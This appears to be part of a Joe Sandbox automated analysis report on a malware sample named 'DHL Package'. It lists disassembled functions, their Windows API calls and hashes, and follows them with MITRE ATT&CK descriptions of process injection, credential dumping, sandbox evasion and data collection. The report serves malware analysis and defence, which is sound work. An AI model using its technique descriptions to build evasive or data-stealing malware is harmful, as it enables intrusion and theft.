SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8

Function 00404BDE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
wsprintfW.USER32 ref: 00404C88
SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B

Strings

%u.%u%s%s, xrefs: 00404C69

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
Opcode Fuzzy Hash: d10727bfe45036c7ef4c0945d22c1597f07d9cc2f464814d913e74af0bd9f4be
Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8

Function 00405912 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405955
GetLastError.KERNEL32 ref: 00405969
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
GetLastError.KERNEL32 ref: 00405988

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9

Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
GetTickCount.KERNEL32 ref: 00402FE2
CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD

Function 004053B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053E6
CallWindowProcW.USER32(?,?,?,?), ref: 00405437

Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F

Strings

, xrefs: 004053C7

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69

Function 00405F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F1E
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,0040348D,00437000,00437800,00437800,00437800,00437800,00437800,00437800,004036D9), ref: 00405F39

Strings

nsa, xrefs: 00405F0D

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68

Function 004059C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
CloseHandle.KERNEL32(?), ref: 004059FA

Strings

Error launching installer, xrefs: 004059D7

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C

Function 00406F2F Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45

Function 00407130 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45

Function 00406E46 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45

Function 0040694B Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45

Function 00406D99 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45

Function 00406EB7 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45

Function 00406E03 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45

Function 00151B27 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

F, xrefs: 00151AF7
F, xrefs: 00151BD7
F, xrefs: 00151BBA
F, xrefs: 00151B90

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID: F$F$F$F
API String ID: 0-1844600021
Opcode ID: ba32fa2ca0e9931f3434cf64946129d1aa74178445d166b95a0b8483b47bebfc
Instruction ID: 5f35c7d98d7a3aa79bc1d937fb7fb63d328035a0b5efebeb86782b0997959854
Opcode Fuzzy Hash: ba32fa2ca0e9931f3434cf64946129d1aa74178445d166b95a0b8483b47bebfc
Instruction Fuzzy Hash: 08319E34A093449FDB06EBB8C45179EBFB1EF86309F1080EAD4509B296DB395909CB92

Function 00405E36 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E5E
CharNextA.USER32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E6F
lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 98c30faecf84a4e678f1c8c5aee25e578da6ba24d366b38437dab149ad6906fd
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 4AF06232504458FFD7029BA5DD04DAEBBA8EF16354B2540AAE884F7210D674EF01DBA9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

